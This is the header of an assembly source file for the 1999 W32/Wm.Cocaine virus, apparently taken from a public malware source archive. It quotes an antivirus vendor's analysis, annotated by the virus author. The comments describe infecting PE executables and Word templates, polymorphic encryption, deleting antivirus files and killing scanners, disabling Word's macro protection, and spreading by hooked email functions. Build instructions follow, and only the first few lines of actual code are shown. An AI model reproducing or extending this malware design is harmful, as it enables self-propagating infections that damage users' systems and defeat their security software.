mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 14:35:27 +00:00
5768 lines
192 KiB
NASM
5768 lines
192 KiB
NASM
;Wm/W32.Cocaine - 22231 bytes
|
||
;(c) Vecna 1999
|
||
;
|
||
;This virus infect PE and DOC files.
|
||
;
|
||
;Study the code and the AVPVE description for others features.
|
||
;
|
||
;Small corrections in AVPVE text are between []'s
|
||
;
|
||
;
|
||
;
|
||
;AVPVE Description:
|
||
;
|
||
; Cocaine
|
||
;
|
||
; ------------------------------------------------------------------------
|
||
; This is a parasitic Windows PE files and MS Word normal templates infector
|
||
; with email spreading ability, about 22Kb of length. The virus has three
|
||
; instances: in Windows PE EXE files, in Word NORMAL template and as attached
|
||
; file in email messages.
|
||
;
|
||
; The virus code in infected PE EXE files is its main instance. When it is
|
||
; executed, the virus searches for PE EXE files in the current and Windows
|
||
; directories and infects them. The virus also drops infected an NORMAL.DOT
|
||
; to the MS Word directory from its PE EXE instance, as well as sends
|
||
; infected emails. The virus instance in the NORMAL template drops and
|
||
; executes the infected PE EXE file on each document closing, and is not able
|
||
; to infect other documents and templates. [* Wrong. Check the infected doc I
|
||
; included, or the file MACRO.INC for the code *] The virus code in emails
|
||
; appears as attached file that is infected an PE EXE Windows executable file
|
||
; with a random name, or infected NORMAL template.
|
||
;
|
||
; The virus is per-process memory resident. This means that the virus copy
|
||
; may stay in memory for a long time until the infected application
|
||
; terminates. In case only "short-life" applications are infected, the virus
|
||
; code is not present in the system memory for long time. In case an
|
||
; application in permanent use is infected, the virus is active during a long
|
||
; time, hooks Windows functions, infects PE EXE files that are accessed and
|
||
; sends email messages.
|
||
;
|
||
; The virus is polymorphic in PE files as well as in Word NORMAL template.
|
||
; The virus has two polymorphic engines in its EXE code: the first of them
|
||
; generates polymorphic decryption loop in infected PE EXE files, the second
|
||
; one makes the virus macro program in infected NORMAL.DOT polymorphic too.
|
||
;
|
||
; The virus has a payload routine that is executed when an infected file is
|
||
; run after four months when it was infected. [* 8 months... Maybe AAM 12
|
||
; confused AVers ;-) *] This routine displays message boxes that have the
|
||
; header "W32/Wm.Cocaine" and the text that is randomly selected from seven
|
||
; variants:
|
||
;
|
||
; Your life burn faster, obey your master...
|
||
; Chop your breakfast on a mirror...
|
||
; Veins that pump with fear, sucking darkest clear...
|
||
; Taste me you will see, more is all you need...
|
||
; I will occupy, I will help you die...
|
||
; I will run through you, now I rule you too...
|
||
; Master of Puppets, I'm pulling your strings...
|
||
;
|
||
; The virus pays attention to anti-virus programs and tries to disable them.
|
||
; Each time an infected file is executed and virus installs its per-process
|
||
; resident copy it looks for anti-virus data files in the current directory
|
||
; and deletes them. The names of these files look like follows: KERNEL.AVC,
|
||
; SIGN.DEF, FIND.DRV, NOD32.000, DSAVIO32.DLL, SCAN.DAT, VIRSCAN.DAT (AVP,
|
||
; DSAV, NOD, SCAN and other anti-virus data files). The virus also locates
|
||
; and terminates old version of AVP Monitor on-access scanner. [* Not so
|
||
; old ;-) *]
|
||
;
|
||
; The known virus version has bugs and cannot spread from Word macro instance
|
||
; to Windows executable. It also has a bug in PE EXE infection routine and
|
||
; corrupts some WinNT executable files. [* What can I say... is buggy :-) *]
|
||
;
|
||
; The virus has a "copyright" text:
|
||
;
|
||
; (c) Vecna
|
||
;
|
||
; Some virus routines (especially macro ones) are related to the "Fabi"
|
||
; multi-platform virus, and some infected files may be detected by the name
|
||
; of this virus. [* Probably, the loader, before it load the poly virus code,
|
||
; can be detected as Fabi *]
|
||
;
|
||
; Technical details
|
||
;
|
||
; The virus has quite large size for a program written in Assembler - about
|
||
; 22Kb, and has many routines that are quite interesting from a technical
|
||
; point of view.
|
||
;
|
||
; Running infected EXE
|
||
;
|
||
; When an infected file takes control the polymorphic decryption loops are
|
||
; executed. They decrypt the virus code layer-by-layer (the virus is
|
||
; encrypted by several loops - from two till five) and pass control to the
|
||
; virus installation routine. It is necessary to note that several virus
|
||
; blocks stay still encrypted. The virus decrypts and accesses them in case
|
||
; of need, and then encrypts back. These blocks are MS Word infection data
|
||
; and routine as well as PE EXE polymorphic engine.
|
||
;
|
||
; The virus installation routine looks for necessary Windows API functions
|
||
; addresses that are used by the virus later. The list of these functions is
|
||
; quite long, this is caused by list of things the virus does to spread
|
||
; itself. The functions list the virus looks for is below:
|
||
;
|
||
; Exported by Functions list
|
||
; ----------- --------------
|
||
; KERNEL32.DLL: GetProcAddress GetModuleHandleA CreateProcessA
|
||
; CreateFileA WinExec CloseHandle LoadLibraryA FreeLibrary
|
||
; CreateFileMappingA MapViewOfFile UnmapViewOfFile
|
||
; FindFirstFileA FindNextFileA FindClose SetEndOfFile
|
||
; VirtualAlloc VirtualFree GetSystemTime
|
||
; GetWindowsDirectoryA GetSystemDirectoryA
|
||
; GetCurrentDirectoryA SetFileAttributesA SetFileTime
|
||
; ExitProcess GetCurrentProcess WriteProcessMemory WriteFile
|
||
; DeleteFileA Sleep CreateThread GetFileSize SetFilePointer
|
||
; USER32.DLL: MessageBoxA FindWindowA PostMessageA
|
||
; ADVAPI32: RegSetValueExA RegCreateKeyExA RegOpenKeyExA
|
||
; RegQueryValueExA RegCloseKey
|
||
; MAPI32.DLL: MAPISendMail
|
||
;
|
||
; The virus gets these functions' addresses by the standard Windows virus
|
||
; trick: it locates the image on KERNEL32.DLL in the Windows memory, scans
|
||
; its Export table and gets addresses of two functions: GetModuleHandle and
|
||
; GetProcAddress [* The import table is searched while infecting a file for
|
||
; GetModuleHandle *]. By using these two functions the virus is then able
|
||
; easily locate all addresses of other necessary functions. The most
|
||
; interesting feature of this routine is: this is the first virus that processes
|
||
; not only Win95/98 and WinNT addresses while looking for KERNEL32.DLL image,
|
||
; but pays attention for Win2000 addresses also [* If the host dont import
|
||
; GetModuleHandle this is *]
|
||
;
|
||
; The virus then locates and infects the MS Word, then searches for PE EXE
|
||
; files and also infects them, then hooks a set of system events (files and
|
||
; emails access) that is used to locate and infect more files as well as
|
||
; spread virus copy to the Internet in attached emails.
|
||
;
|
||
; Infecting MS Word
|
||
;
|
||
; The very first infection routine that is activated by the virus is its MS
|
||
; Word affecting routine, if it is installed in the system. First of all here
|
||
; the virus checks for C:\ANCEV.SYS file presence.
|
||
;
|
||
; The C:\ANCEV.SYS file ("ANCEV"="VECNA" written backward) has a special
|
||
; purpose. This file is created when the MS Word template infection routine
|
||
; completes. So, this file presence means that MS Word was located and
|
||
; NORMAL.DOT template was infected. In this case the virus while sending
|
||
; emails sends NORMAL.DOT template but not the infected EXE dropper [* I used
|
||
; to think that DOC files are less suspicious to send by email, but, after
|
||
; melissa's shits, EXE are better i gues *]
|
||
;
|
||
; So, the virus checks for this file at the very top of MS Word infection
|
||
; routine. If it does not exist, the virus continues infection. If this file
|
||
; is found, the virus randomly in one cases of ten continues infection, and
|
||
; in nine cases of ten leaves infection routine. This means that in one case
|
||
; of ten the MS Word NORMAL.DOT will be re-infected anyway [* This is done to
|
||
; avoid lamers creating a fake ANCEV.SYS to not have WinWord infected *].
|
||
;
|
||
; The virus then disables the Word VirusWarning protection by modifying the
|
||
; system registry keys where Word stores its settings:
|
||
;
|
||
; SOFTWARE\Microsoft\Office\8.0\Word\Options, EnableMacroVirusProtection
|
||
;
|
||
; The virus then gets Word's templates directory also by reading system
|
||
; registry:
|
||
;
|
||
; SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates
|
||
;
|
||
; and deletes the NORMAL.DOT template in there, and then creates a new
|
||
; NORMAL.DOT template file - infected one. The infected NORMAL.DOT contains a
|
||
; small macro inside. This macro has "AutoExec" Word auto-name - it will be
|
||
; automatically executed on next Word startup and will import the main virus
|
||
; macro from the C:\COCAINE.SYS file.
|
||
;
|
||
; The C:\COCAINE.SYS file is created by the virus just after overwriting the
|
||
; NORMAL.DOT template. This SYS file is a text file that contains VBA
|
||
; program's source code. This source is extracted by the virus from its code,
|
||
; mixed with junk (polymorphic) VBA instructions and appended by infected PE
|
||
; EXE dropper converted to ASCII strings.
|
||
;
|
||
; So, the MS Word infection routine does its work in two steps. First of all
|
||
; the virus replaces the original NORMAL.DOT with a new one that contains the
|
||
; "AutoExec" macro program (loader) that imports complete virus code from the
|
||
; C:\COCAINE.SYS file, and completes by that porting virus code from PE EXE
|
||
; file to MS Word template.
|
||
;
|
||
; From Word to EXE
|
||
;
|
||
; To drop the PE EXE file from its Word template instance the virus uses a
|
||
; standard macro-viruses' trick. It creates two files: the first of them is
|
||
; the C:\COCAINE.SRC file with infected PE EXE file image converted to ASCII
|
||
; form, and second file is a DOS batch with random name. This batch file
|
||
; contains a set of instructions that execute the DOS DEBUG utility that
|
||
; converts ASCII dump back to binary PE EXE form, and executes it [* This is
|
||
; the worst imaginable way to drop a EXE file ever *]
|
||
;
|
||
; So the virus jumps to Windows out of infected Word template.
|
||
;
|
||
; Infecting PE EXE files
|
||
;
|
||
; When MS Word is affected, the virus goes to PE EXE files infection routine.
|
||
; The virus looks for PE EXE files in the current and Windows directories and
|
||
; infects them. The only files infected are those that have .EXE or .SCR
|
||
; filename extensions.
|
||
;
|
||
; The virus then looks for installed browser and mailer and infects them too.
|
||
; The virus locates them by system registry keys in HKEY_LOCAL_MACHINE
|
||
; storage:
|
||
;
|
||
; SOFTWARE\Classes\htmlfile\shell\open\command
|
||
; SOFTWARE\Classes\mailto\shell\open\command
|
||
;
|
||
; The virus needs these files to be infected for activating its Internet
|
||
; infection routines. When these Internet accessing applications are
|
||
; infected, the virus copy is active in the memory for a long time exactly at
|
||
; the moment a user is connected to the Internet. This is necessary to the
|
||
; virus to realize its Internet spreading ability.
|
||
;
|
||
; PE EXE Infection mechanism
|
||
;
|
||
; The virus checks several conditions before infecting the file. 1st: the
|
||
; file length has to be not divisible by 101 (it is virus protection to avoid
|
||
; multiple infection, the already infected PE EXE files have such length).
|
||
; 2nd: when the virus looks for EXE files in the current and Windows
|
||
; directories to infect them, the name of the file cannot contain 'V' letter
|
||
; or digits, here the virus avoids most popular anti-virus scanners and "goat
|
||
; files" infection.
|
||
;
|
||
; If the first section has big enough size (more than 2304 bytes), the virus
|
||
; writes to there several blocks of junk code that passes the control
|
||
; block-by-block to the main virus decryption loops. There are eight blocks
|
||
; written to files when the virus infects them:
|
||
;
|
||
; +------------+
|
||
; | |
|
||
; |PE Header | ---------------+
|
||
; +------------+ |
|
||
; | +-----+<-+| |
|
||
; | |Junk2| || |
|
||
; | +-----+-+|| Entry Point |
|
||
; |+-----+ |||<---------------+
|
||
; ||Junk1| |||
|
||
; |+-----+----+|
|
||
; | | |
|
||
; |+-----+<--+ |
|
||
; ||Junk3| |
|
||
; |+-----+----+|
|
||
; | V|
|
||
; | . . . |
|
||
; | +-----+|
|
||
; |+----|Junk8||
|
||
; || +-----+|
|
||
; |V |
|
||
; |------------|
|
||
; |Virus code |
|
||
; | |
|
||
; +------------+
|
||
;
|
||
; In this case the virus does not modify program's entry point address, but
|
||
; it needs to restore all overwritten blocks of host file before return
|
||
; control to original entry procedure [* CommanderBomber/OneHalf rulez *].
|
||
;
|
||
; If the first section is short, the control goes directly to virus code. In
|
||
; this case the virus modifies program's entry address to get control when
|
||
; infected files are executed.
|
||
;
|
||
; The virus code itself is encrypted by several (from two till five)
|
||
; polymorphic loops. The polymorphic engine in the virus is quite strong, and
|
||
; produces about 2Kb of polymorphic loops [* This poly is kewl *]
|
||
;
|
||
; The virus also patches the Import section to get functions GetProcAddress,
|
||
; GetModuleHandle, CreateProcessA, WinExec and MAPISendMail when infection
|
||
; executable is run.
|
||
;
|
||
; After all the virus writes its encrypted code to the end of last file
|
||
; section, and increases section size by patching PE header.
|
||
;
|
||
; Intercepting Events
|
||
;
|
||
; When the Word and PE EXE direct infection routines are complete, the virus
|
||
; hooks several Windows functions and stays in Windows memory as part of the
|
||
; host program. The virus hooks two file access function WinExec and
|
||
; CreateProcessA, if they are imported by the host program from the
|
||
; KERNEL32.DLL. When these functions get control (a program is executed) the
|
||
; virus gets the program's file name, gets its directory, searches and
|
||
; infects PE EXE files in this directory.
|
||
;
|
||
; Sending Emails
|
||
;
|
||
; The virus per-process resident code also runs email infection thread, hooks
|
||
; MAPISendMail that is exported from MAPI32.DLL, "connect" and "recv" from
|
||
; WSOCK32.DLL and GetProcAddress from KERNEL32.DLL.
|
||
;
|
||
; The first hook is used by the virus to send its copy to the Internet. When
|
||
; the virus intercepts this event it looks for attached data in the message.
|
||
; If there is no attach, the virus appends to the message infected NORMAL.DOT
|
||
; or infected PE EXE file (the latter is created on the disk in the
|
||
; C:\ENIACOC.SYS file).
|
||
;
|
||
; The "GetProcAddress", "connect" and "recv" hooks are used by the virus to
|
||
; realize second method of infected Emails sending. When a message arrives,
|
||
; the virus scans its header for "mailto:" field, gets the address from there
|
||
; and stores it in its own database. [* MAILTO: is a HTML command/instruction
|
||
; used very often. Nice idea :-) *]
|
||
;
|
||
; When taking control the infection thread looks for email address caught by
|
||
; "connect" and "recv" hooks, calculates its CRC and compares with its
|
||
; "already infected addresses" database that is stored in the BRSCBC.DAT file
|
||
; in the Windows system directory. If this address was not used yet, the
|
||
; virus adds it to its BRSCBC.DAT database, creates a message with NORMAL
|
||
; template or infected PE EXE file, and sends it by using MAPISendMail
|
||
; function [* Why BRSCBC? ;-) *]. The subject field for the message is
|
||
; randomly selected from variants:
|
||
;
|
||
; Kewl page!
|
||
; Improvement to your page
|
||
; Your page r0x0r!
|
||
; You must see this...
|
||
; Secret stuff!
|
||
; [* or a empty subject line *]
|
||
;
|
||
; By using the BRSCBC.DAT database the virus avoids duplicate sendings, but
|
||
; on each infected program run the virus depending on its random counter
|
||
; deletes this file, and clears "do-not-send" database by that.
|
||
;
|
||
; The "GetProcAddress" that is also hooked by virus TSR copy is used only to
|
||
; intercept "connect" and "recv" WSOCK32.DLL functions, if an application
|
||
; does not import these routines "by default", but activates them in case of
|
||
; need. To do that the "GetProcAddress" virus' hook intercepts accesses to
|
||
; "connect" and "recv" WSOCK32.DLL functions' addresses. If an application
|
||
; tries to get addresses of these routines to use Internet connections, the
|
||
; virus returns addresses of its own "connect" and "recv" hookers, and so
|
||
; intercepts Internet connection [* Fucking OPERA *]
|
||
|
||
;Thnz to IkX for accepting this contribution
|
||
|
||
;Greetz to Z0MBiE, VirusBuster and Reptile(the first to use macro autoload)
|
||
|
||
;Special greetz goes to Jacky Qwerty:
|
||
;Los virus no serian lo que son hoy si no fuera por vos!
|
||
;THNDV/CAP/Cabanas RULEZ! (THNDV solo para los mas vivos ;> )
|
||
|
||
;Big fuckZ to T2000 and El Gusano Boliviano: lamers and ripperz!!!!
|
||
|
||
;Greetz to all creative coders
|
||
|
||
;Use the pre-compiled virus, but if you're a sort of 37337 d00d... to compile:
|
||
; TASM /M /ML COKE.ASM
|
||
; TLINK32 COKE,,,IMPORT32
|
||
; PEWRSEC COKE.EXE
|
||
;Remember to split the big COKE.ASM in the smaller incz before!
|
||
;(and beware the trap ;> )
|
||
|
||
;contacts: vecna_br@hotmail.com (except questions about compiling)
|
||
|
||
.586p
|
||
.model flat, STDCALL
|
||
locals
|
||
|
||
include host.inc
|
||
|
||
|